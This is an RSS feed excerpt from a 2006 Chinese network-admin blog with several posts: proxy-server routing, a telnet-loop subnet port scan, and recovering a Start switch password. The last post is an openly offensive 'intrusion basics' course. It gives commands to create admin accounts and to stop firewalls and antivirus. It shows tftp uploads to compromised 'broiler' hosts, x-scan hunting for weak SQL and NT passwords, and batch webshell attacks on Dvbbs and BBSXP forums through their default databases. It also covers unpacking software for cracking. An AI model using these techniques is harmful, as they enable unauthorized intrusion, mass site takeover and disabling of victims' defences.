<img src ="http://www.cnitblog.com/zhangyafei/aggbug/20816.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-19 19:24 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/19/20816.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>代理服务器的路由分析</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/19/20802.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Tue, 19 Dec 2006 08:36:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/19/20802.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/20802.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/19/20802.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/20802.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/20802.html</trackback:ping><description><![CDATA[
		<p>对于小型用户群体或家庭用户接入Internet，采用拨号上网不失为一种廉价实用的方式。在局域网上通过代理服务器软件便可以解决多用户共享访问Internet问题，代理服务器实质上是一个介于用户群体和Internet之间的桥梁，用以实现其网络用户对Internet的访问。 </p>
		<p>　　利用局域网 </p>
		<p>　　目前局域网的组网产品很多，以太网交换机或集线器（HUB）价格低廉，非常容易实现局域网客户的互联。本文以现有园区网为例，阐述如何利用PROXY代理服务器实现Internet连接，并进行代理服务器的内部路由分析。本局域网的拓扑结构如图1所示，局域网组成为：客户机若干台，服务器一台，拨号网络服务器一台，连接Internet的调制解调器一台。 </p>
		<p>　　具体配置如下： </p>
		<p>　　1、客户机：安装WINDOWS 95/98，IE浏览器（Internet Explorer4.0或5.0）。在Internet Explorer的“选项，连接”一栏中选择“使用代理服务器访问Internet”，并将代理服务器的IP地址和端口号（80）填入“地址”和“端口”项，如此便完成了客户端的简单配置。 </p>
		<p>　　2、服务器：安装WINDOWS NT和PROXY软件。配置服务器的RAS、拨号网络、TCP/IP等，建立WINDOWS用户帐户，启动PROXY软件，启动WEB、FTP等代理任务并进行权限设置，给予客户访问Internet的权限等。 </p>
		<p> 　　<br />3、调制解调器：在服务器端配置一台调制解调器（MODEM），一条电话线。拨通本地的Internet电话，如169、163等。 </p>
		<p>　　4、拨号网络服务器：在局域网中为远程用户提供服务，使远程用户可以通过专用通讯线路与局域网连接。 </p>
		<p>　　代理服务器的路由问题 </p>
		<p>　　配置服务器的RAS服务和拨号网络后，进行拨号连接。此时的代理服务器中相当于存在两块接口卡，即一个网卡和一个调制解调器，可以把它看作是一个路由器，为客户和外界提供路由转发功能，因此必须查看并调整服务器的路由设置，以保证服务器与客户的正常通讯。 </p>
		<p>　　在服务器上进行拨号，在DOS模式下通过ROUTE命令查看服务器的路由表。下面仅以缺省路由为例简单分析NT服务器在拨号过程中的路由表，假设10.119.40.254为服务器所在网段的网关，10.119.40.49为NT服务器网卡的IP地址。 </p>
		<p>　　拨号前服务器路由表（表1）： </p>
		<p>　　NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC </p>
		<p>　　0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 1 </p>
		<p>　　拨号后服务器路由表（表2）： </p>
		<p>　　NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC </p>
		<p>　　0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 2 </p>
		<p>　　0.0.0.0 0.0.0.0 10.18.168.168 10.18.168.168 1 </p>
		<p>　　其中10.18.168.168为INTERNET服务器分配给本拨号网络（调制解调器）的IP地址。经对比表1和表2，在拨号前后的缺省路由有了变化。分析这一现象，主要是由于在服务器中“拨号网络”，“TCP/IP设置”的选项中，选择了“使用拨号网络的默认网关”的缘故，这样服务器每次向10.119.40.0网段的客户发送信息都首先经过10.18.168.168的地址。当网络上的客户要求访问INTERNET站点时，每次都要通过局域网到NT服务器，然后至MODEM。所以必须保障客户机与服务器的正常连通，使路由过程通过10.119.40.49局域网网卡进行。应用PING命令进行检测，服务器可以PING通客户机，而客户机PING服务器时出现超时（TIME OUT）。这一现象表明由于代理服务器的默认路由发生了变化，从而使客户与服务器的连通首先要经过10.18.168.168来转发。解决这一问题须做以下设置，假设某客户所在网段为122.103.1.0，SUBMASK:255.255.255.0，需向路由表中填加指定项目，即执行命令ROUTE ADD 122.103.1.0 255.255.255.0 10.119.40.49。其中10.119.40.49为NT服务器的网卡IP地址，再查看服务器路由表如下： </p>
		<p>　　NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC </p>
		<p>　　0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 2 </p>
		<p>　　0.0.0.0 0.0.0.0 10.18.168.168 10.18.168.168 1 </p>
		<p>　　122.103.1.0 255.255.255.0 10.199.40.254 10.119.40.49 1 </p>
		<p>　　进一步分析，我们还可以通过修改默认路由的方法来达到我们的目的，即使用ROUTE ADD 0.0.0.0 0.0.0.0 10.119.40.49 1 IF METRIC=2 </p>
		<p>　　使路由表设置为： </p>
		<p>　　NETWORK ADDRESS NETMASK GATEWAY ADDRESS INTERFACE METRIC </p>
		<p>　　0.0.0.0 0.0.0.0 10.119.40.254 10.119.40.49 1 </p>
		<p>　　作为特殊情况，我们分析一下局域网远程用户的路由问题。在局域网中存在远程用户，它们通常经过专用的通讯线路与局域网连接，如果它们试图通过代理服务器访问INTERNET，必须在NT服务器上配置路由表。由于这类远程用户访问INTERNET需要经过2次拨号服务，在PROXY代理服务器上直接的路由设置尤其必要。如上所述，局域网的客户还可以通过修改默认路由的方法使服务器和客户连通。对于远程客户则不然，必须直接设置代理服务器的路由。假设远程用户（拨号网络服务器）所在的网段为122.100.1.0，SUBMASK:255.255.255.0，须加入路由：ROUTE ADD 122.100.1.0 255.255.255.0 10.119.40.49，才能保证远程用户的直通性。否则，在客户拨通局域网时，远程客户机能PING通网上其它所有的设备，惟独PING NT服务器时超时错误。这说明代理服务器的默认路由此时并没有起作用。 </p>
		<p>　　用户的管理 </p>
		<p>　　通过WINDOWS NT可以对每个代理用户进行管理。在客户访问INTERNET时，首先要在代理服务器上进行用户验证，在用户输入正常的用户名和密码时，才能为其提供INTERNET服务，然后通过代理服务器访问INTERNET。代理服务器软件可使用MS PROXY 2.0，它提供了大量的代理权限的控制，使用它可以对授权用户、访问站点等进行方便地管理、监视、记录等。 </p>
		<p> </p>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/20802.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-19 16:36 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/19/20802.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>黑客技巧之DOS命令扫描网段的端口</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/18/20738.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Mon, 18 Dec 2006 05:44:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/18/20738.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/20738.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/18/20738.html#Feedback</comments><slash:comments>3</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/20738.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/20738.html</trackback:ping><description><![CDATA[
		<p>不需要任何工具，DOS命令扫描一个网段的全部端口！在Windows2000下开一个DOS窗口，然后执行<br />            for /l %a in (1,1,254) do start /min /low telnet 192.168.0.%a 3389<br />          <br />这样192.168.0.x这个段的所有开放3389端口得主机都会暴露。<br />这条命令执行后，会在任务栏开254个小窗口。然后telnet链接失败的窗口会在大约5秒后自动退出，剩下的窗口就是相对应开放端口的主机了。 看一下小窗口的标题可以得知主机的ip地址，如果你觉得机器性能很好的话 可以把/low参数去了。 <br />现在扫描一台主机的多个端口，如下 </p>
		<p>             for /l %a in (1,1,65535) do start /low /min telnet 192.168.0.1%a<br />              <br /> <br />这样就扫描192.168.0.1的1到65535端口。 </p>
		<p>现在扫描一个网段的所有端口 </p>
		<p>             for /l %a in (1,1,254) do for /l %b in (1,1,65535) do start /low/min telnet 192.168.0.%a %b<br />           <br /> <br />这样就会扫描192.168.0.x段的全部1到65535段口。 </p>
		<p>以上命令只能在Windows2000下使用，因为/l累加参数是Windows2000对for的扩展，当然WindowsXP和Windows.NET都可以用，WindowsME我没有试过，因为没有WindowsME的机器。<br /></p>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/20738.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-18 13:44 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/18/20738.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>破解交换机密码地全部过程</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/17/20676.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Sun, 17 Dec 2006 06:07:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/17/20676.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/20676.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/17/20676.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/20676.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/20676.html</trackback:ping><description><![CDATA[
		<div class="ContentFont" id="NewaspContentLabel" style="DISPLAY: block; PADDING-BOTTOM: 0px; PADDING-LEFT: 10px; PADDING-RIGHT: 10px; PADDING-TOP: 0px">
				<font id="font_word" style="FONT-FAMILY: 宋体, Verdana, Arial, Helvetica, sans-serif; FONT-SIZE: 14px">
						<font id="Zoom">交换机和路由器都需要有一定的安全保证，也就是说要及时为他们配置合理的密码，那么如果这个密码忘记了怎么办呢？笔者就遇到过这么一次，由于岗位调动，以前的网络管理员离开了本部门，却把交换机上设置了密码，而且没有告诉我这个接任的网络管理员。怎么办呢？送回厂商破解又太麻烦了。于是我亲手经历了一次破解密码的过程。 <br /><br /><br />　　一，网络环境： <br /><br />　　公司使用实达的3500系列（具体型号是3548）交换机，在交换机上面连接了一台华为2621路由器，通过电信的光纤上网。实际情况这台实达3548交换机被以前的网络管理员设置了密码而没有告诉我。所以破解他的密码成为本篇文章的核心。 <br /><br />　　二，准备工作： <br /><br />　　由于整个工作需要断网，毕竟涉及到重新启动交换机等操作，所以选择时间在工作下班后的晚上23点。另外由于破解密码这类操作都必须使用console控制台线来设置，所以地点只能是中心机房。笔者找到了实达3548设备的所有相关工具，包括安装说明与console控制线等。 <br /><br />　　三，实战破解密码： <br /><br />　　根据笔者以往经验实达所有设备的使用和操作命令语句都应该和cisco设备类似，所以原本以为按照破解cisco设备密码的步骤就可以轻松搞定。谁知道一上手才发现原来差别还真不小。一般来说cisco设备都是通过修改配置寄存器configuration register来实现破解密码的操作。在实达交换机中根本不存在配置寄存器configuration register这个概念。通过查询资料才发现，原来实达交换机是使用修改超级终端配置的方法来破解密码的。 <br /><br />　　第一步：将实达交换机的配套console控制线连接到设备的console管理接口。 <br /><br />　　第二步：将console控制线的另一断连接到网络管理员调试使用的笔记本的com串口上。 <br /><br />　　第三步：进入笔记本系统桌面，点“开始-&gt;所有程序-&gt;附件-&gt;通讯-&gt;超级终端”。 <br /><br />　　第四步：启动系统的超级终端后我们随便为新建立的连接起一个名字。 <br /><br />　　第五步：在连接设置处的“连接时使用”地方通过下拉菜单选择刚刚使用console控制线连接的端口。例如com1口。 <br /><br />　　第六步：在com1属性设置窗口中我们对连接的参数进行配置。一般来说我们正常连接交换机应该采用每秒位数9600，数据位为8，奇偶校验是无，停止位是1，数据流控制是无。不过要是想破解实达交换机的密码的话就需要修改这些数值。将pc超级终端串口速率设成57600，其他和上面写的相同即可。 <br /><br />第七步：使用终端连接到交换机后，再打开交换机的电源，在交换机启动后进行自检时立即按下“esc”键多次进入交换机的监控模式。终端界面将出现多个选项，包括一些基本的初始化设置。 <br /><br />　　小提示： <br /><br />　　刚开始笔者按照第七步的步骤尝试并没有成功，超级终端界面总是显示很多个“。。。。。”。后来才发现原来交换机必须在超级终端连接后才能加电启动，如果先开交换机再用超级终端连接的话则无法进入监控模式。 <br /><br />　　第八步：根据菜单提示，将配置文件config.text上传（upload）至网络管理员使用的笔记本，然后删除交换机上的配置文件config.text。 <br /><br />　　第九步：在笔记本上打开刚下载的保存在系统硬盘中的config.text文件，将以下语句 <br /><br />　　enable secret level 1 5 !e,1u_;c9&amp;-8u0h <br /><br />　　enable secret level 15 5 *r_1u_;c3vw8u0h <br /><br />　　删除然后保存退出。 <br /><br />　　第十步：根据交换机监控模式的提示，将笔记本上修改的config.text再下载（download）到交换机中。 <br /><br />　　第十一步：重新将笔记本的超级终端串口速率设成9600，其他保持默认参数。交换机加电重启后，进入交换机配置界面，你就会发现我们可以重新配置交换机的密码了，包括远程telnet的管理密码以及本机的特权密码。此后交换机的密码也将变成你刚刚配置的，而其它配置则保留不变，并不会影响任何使用。 <br /><br />　　小提示： <br /><br />　　在实际使用中笔者发现使用实达3550交换机的监控模式中的上传和下载文件功能并不稳定，经常出现传输失败的提示。所以笔者索性直接在监控模式中将config.text删除，然后重新启动交换机重新配置所有交换机信息。这种情况适用于交换机自身配置不多也不复杂，另外网络管理员也需要对设置语句比较熟悉。 <br /><br />　　总结： <br /><br />　　经过本次实战破解交换机密码的操作，笔者再次明白了对于路由交换设备来说，不同厂商操作程序和步骤绝对是不同的，即使命令语句类似但是在其他高级操作上还是大相径庭的。因此本篇文章介绍的所有内容仅仅是针对实达路由器与交换机，如果你遇到的是其他设备则需要采取其他的方法来解决。</font>
				</font>
		</div>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/20676.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-17 14:07 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/17/20676.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>电脑黑客基本技术和入侵的关键字以及电脑攻防应用</title><link>http://www.cnitblog.com/zhangyafei/archive/2006/12/17/20675.html</link><dc:creator>网工地带</dc:creator><author>网工地带</author><pubDate>Sun, 17 Dec 2006 05:32:00 GMT</pubDate><guid>http://www.cnitblog.com/zhangyafei/archive/2006/12/17/20675.html</guid><wfw:comment>http://www.cnitblog.com/zhangyafei/comments/20675.html</wfw:comment><comments>http://www.cnitblog.com/zhangyafei/archive/2006/12/17/20675.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/zhangyafei/comments/commentRss/20675.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/zhangyafei/services/trackbacks/20675.html</trackback:ping><description><![CDATA[
		<font face="宋体">第一课: 入侵必备DOS命令总结 </font>
		<p>一.对用户操做 </p>
		<p>net user --------查看有哪些用户</p>
		<p>net user guest /active:yes ------ 激活guest用户 </p>
		<p>net user 用户名　密码　/add ------建立用户 </p>
		<p>net localgroup administrators 用户名 /add ------- 把“用户”添加到管理员中使其具有管理员权限</p>
		<p>二．必备命令</p>
		<p>net start -----查看开启了哪些服务</p>
		<p>net start 服务名-----开启服务</p>
		<p>net stop 服务名------停止某服务</p>
		<p>netstat -an :查看端口的网络连接情况</p>
		<p>ipconfig :查看本地ip地址</p>
		<p>三．关防火墙，杀毒软件命令</p>
		<p>net stop sharedaccess ----关系统自带防火墙</p>
		<p>pskill.exe ravmon -----杀掉瑞星软件</p>
		<p>pskill.exe pfw ----关天网防火墙</p>
		<p>net stop "Symantec AntiVirus"----关于诺顿企业版</p>
		<p>net stop KAVStart------关闭金山杀毒</p>
		<p>向肉鸡上传文件命令:</p>
		<p>第一种方法:tftp</p>
		<p>命令格式:tftp -i 你的公网IP get xx.exe</p>
		<p>：计算机运行命令全集 winver---------检查<a class="wordstyle" href="http://www.hack58.net/" target="_blank"><font color="#002c99">Windows</font></a>版本<br />wmimgmt.msc----打开<a class="wordstyle" href="http://www.hack58.net/" target="_blank"><font color="#002c99">windows</font></a>管理体系结构<br />wupdmgr--------<a class="wordstyle" href="http://www.hack58.net/" target="_blank"><font color="#002c99">windows</font></a>更新程序<br />winver---------检查<a class="wordstyle" href="http://www.hack58.net/" target="_blank"><font color="#002c99">Windows</font></a>版本<br />wmimgmt.msc----打开<a class="wordstyle" href="http://www.hack58.net/" target="_blank"><font color="#002c99">windows</font></a>管理体系结构<br />wupdmgr--------<a class="wordstyle" href="http://www.hack58.net/" target="_blank"><font color="#002c99">windows</font></a>更新程序<br />wscript--------<a class="wordstyle" href="http://www.hack58.net/" target="_blank"><font color="#002c99">windows</font></a>脚本宿主设置<br />write----------写字板winmsd-----系统信息<br />wiaacmgr-------扫描仪和照相机向导<br />winchat--------XP自带局域网聊天<br />mem.exe--------显示内存使用情况<br />Msconfig.exe---系统配置实用程序 <br />mplayer2-------简易widnows media player<br />mspaint--------画图板<br />mstsc----------远程桌面连接<br />mplayer2-------媒体播放机<br />magnify--------放大镜实用程序<br />mmc------------打开控制台<br />mobsync--------同步命令<br />dxdiag---------检查DirectX信息<br />drwtsn32------ 系统医生<br />devmgmt.msc--- 设备管理器<br />dfrg.msc-------磁盘碎片整理程序<br />diskmgmt.msc---磁盘管理实用程序<br />dcomcnfg-------打开系统组件服务<br />ddeshare-------打开DDE共享设置<br />dvdplay--------DVD播放器<br />net stop messenger-----停止信使服务<br />net start messenger----开始信使服务 <br />notepad--------打开记事本<br />nslookup-------网络管理的工具向导<br />ntbackup-------系统备份和还原<br />narrator-------屏幕"讲述人"<br />ntmsmgr.msc----移动存储管理器<br />ntmsoprq.msc---移动存储管理员操作请求<br />netstat -an----(TC)命令检查接口<br />syncapp--------创建一个公文包<br />sysedit--------系统配置编辑器<br />sigverif-------文件签名验证程序<br />sndrec32-------录音机<br />shrpubw--------创建共享文件夹<br />secpol.msc-----本地安全策略<br />syskey---------系统加密，一旦加密就不能解开，保护<a class="wordstyle" href="http://www.hack58.net/" target="_blank"><font color="#002c99">windows</font></a> xp系统的双重密码<br />services.msc---本地服务设置<br />Sndvol32-------音罖@刂瞥绦?br&gt;sfc.exe--------系统文件检查器<br />sfc /scannow---<a class="wordstyle" href="http://www.hack58.net/" target="_blank"><font color="#002c99">windows</font></a>文件保护<br />tsshutdn-------60秒倒计时关机命令<br />tourstart------xp简介（安装完成后出现的漫游xp程序）<br />taskmgr--------任务管理器<br />eventvwr-------事件查看器<br />eudcedit-------造字程序 <br />explorer-------打开资源管理器<br />packager-------对象包装程序<br />perfmon.msc----计算机性能监测程序<br />progman--------程序管理器<br />regedit.exe----注册表 <br />rsop.msc-------组策略结果集<br />regedt32-------注册表编辑器<br />rononce -p ----15秒关机<br />regsvr32 /u *.dll----停止dll文件运行<br />regsvr32 /u zipfldr.dll------取消ZIP支持<br />cmd.exe--------CMD命令提示符<br />chkdsk.exe-----Chkdsk磁盘检查<br />certmgr.msc----证书管理实用程序<br />calc-----------启动计算器<br />charmap--------启动字符映射表<br />cliconfg-------SQL SERVER 客户端网络实用程序<br />Clipbrd--------剪贴板查看器<br />conf-----------启动netmeeting<br />compmgmt.msc---计算机管理<br />cleanmgr-------**整理<br />ciadv.msc------索引服务程序<br />osk------------打开屏幕键盘<br />odbcad32-------ODBC数据源管理器<br />oobe/msoobe /a----检查XP是否激活<br />lusrmgr.msc----本机用户和组<br />logoff---------注销命令<br />iexpress-------木马捆绑工具，系统自带<br />Nslookup-------IP地址侦测器<br />fsmgmt.msc-----共享文件夹管理器<br />utilman--------辅助工具管理器<br />gpedit.msc-----组策略 </p>
		<p>第二课:x-scan扫描器的使用技巧详解</p>
		<p>一.详解x-scan的配置:</p>
		<p>1.扫描模块设置:</p>
		<p>1).开放服务</p>
		<p>(2).远程控制系统</p>
		<p>(3).nt-server弱口令-----administrator 空口令或弱口令.</p>
		<p>(4).sql-server弱口令 ---sa 空口令或弱口令.</p>
		<p>2.扫描IP范围设置:</p>
		<p>(1).指定IP范围.</p>
		<p>(2).从文件中导入IP列表.</p>
		<p>二.x-scan在入侵中的应用:</p>
		<p>1.对系统的综合安全检测,有针对性的入侵.</p>
		<p>2.找肉鸡</p>
		<p>nt-server弱口令</p>
		<p>sql-server弱口令</p>
		<p>3.邮箱,ftp,vnc的破解</p>
		<p>三.x-scan入侵实例演示部分:</p>
		<p>1.找同一城市的nt-server弱口令肉鸡.(一般都是个人PC)</p>
		<p>2.s扫 + x-scan扫描 找sa空口令肉鸡(一般都是服务器)</p>
		<p>s扫描-----扫开放1433的机子</p>
		<p>x-scan扫描-----对开放1433的机子进行弱口令探测.</p>
		<p>第五课:网站猎手批量入侵实战演示</p>
		<p>黑天 </p>
		<p>一.二个重点要素:</p>
		<p>1.关键字: 存在漏洞的程序所共有的特证.关键字一定要选准,这样命中率才高.</p>
		<p>选择技巧:一般选择论坛最低部的版权信息或程序名称.</p>
		<p>2.检测的页面或文件: 也就是程序存在漏洞的地方</p>
		<p>二.网站猎手批量入侵实战演示篇:</p>
		<p>1.实战演示一:</p>
		<p>检测的页面或文件: data/dvbbs7.mdb</p>
		<p>关键字:Powered By ：Dvbbs Version 7.0.0 </p>
		<p>由默认数据库到拿网站webshell过程:</p>
		<p>第一步:下载动网默认数据库 </p>
		<p>第二步:在数据库中找管理员密码</p>
		<p>技巧:动网论坛不需要破解MD5管理员密码,可以查看日志文件直接找到密码.</p>
		<p>第三步:在前台以jpg格式上传asp木马.</p>
		<p>第四步:用备份数据库功能把jpg格式备份成我们的ASP木马.</p>
		<p>2.演示二:</p>
		<p>检测的页面或文件:database/bbsxp.mdb</p>
		<p>关键字:Powered by BBSXP 7.00 </p>
		<p>3.演示三:</p>
		<p>检测的页面或文件:upfile_flash.asp</p>
		<p>关键字:商城</p>
		<p>四:关于批量得webshell的其它思路</p>
		<p>1.思路一:</p>
		<p>到大型源码下载中心,把下载量较大的源程序,下载回来研究.</p>
		<p>主要研究他们的默认数据库地址,默认管理账号和密码,默认后台.</p>
		<p>然后用关键字结合网站猎手批量检测.很快就提到大量webshell</p>
		<p>2.思路二:社会工程学批量入侵拿webshell</p>
		<p>1.免杀</p>
		<p>
		</p>
		<p>2.破解</p>
		<p>
		</p>
		<p>3.程序汉化,个性修改.</p>
		<p>
		</p>
		<p>二.脱壳四步骤:</p>
		<p>第一步:查壳</p>
		<p>常用查壳工具: PEID ,FI ,PE-SCAN 等.</p>
		<p>第二步:找OEP</p>
		<p>工具:ollydbg</p>
		<p>第三步:脱壳</p>
		<p>常用脱壳工具:</p>
		<p>1.OD自带的脱壳插件:右键脱壳之.</p>
		<p>2.LordPE:选择所调试进程右键,完整脱壳.</p>
		<p>第四步:修复</p>
		<p>Import REConstructor 1.6</p>
		<p>三.在ollydbg脱壳中常用快捷键介绍</p>
		<p>F2: 下断点.</p>
		<p>F4:运行到所选择的那一行.-----遇到向上跳时用到</p>
		<p>F7:单步进入----遇到近call时用到.</p>
		<p>F8:单步跟踪</p>
		<p>F9:运行程序</p>
		<p>Shift+F9 :忽略异常运行</p>
		<p>Alt+M:打开内存镜像</p>
		<p>什么时候用,用哪个?以后会在具体实践操作中具体讲</p>
<img src ="http://www.cnitblog.com/zhangyafei/aggbug/20675.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/zhangyafei/" target="_blank">网工地带</a> 2006-12-17 13:32 <a href="http://www.cnitblog.com/zhangyafei/archive/2006/12/17/20675.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item></channel></rss>